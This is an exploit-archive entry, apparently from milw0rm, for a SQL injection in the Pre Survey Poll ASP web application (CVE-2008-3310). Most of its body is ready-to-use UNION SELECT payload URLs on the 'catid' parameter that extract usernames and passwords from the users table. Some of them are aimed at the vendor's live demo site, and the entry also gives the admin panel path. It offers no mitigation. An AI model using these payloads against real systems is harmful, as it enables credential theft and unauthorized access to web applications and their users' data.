[] NeoSense

Pre Survey Poll - 'catid' SQL Injection

Author: DreamTurk
type: webapps
platform: asp
port: 
date_added: 2008-07-21 
date_updated: 2016-12-14 
verified: 1 
codes: OSVDB-47134;CVE-2008-3310 
tags: 
aliases:  
screenshot_url:  
application_url: 

PRE SURVEY POLL Remote Sql Injection
DreamTurk / sqL Lov3r'Z Crew Co. 2008
Downlod: http://www.preproject.com/poll.asp / Price $28.00
Demo : http://www.preproject.com/poll/default.asp
Sql :
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users

Admin Panel :
http://localhost/patch/admin/default.asp
Greatz : aLL My Friend'Z and str0ke

========================================From Turkey=============================================
Demo Page ;
 http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

 http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

# milw0rm.com [2008-07-22]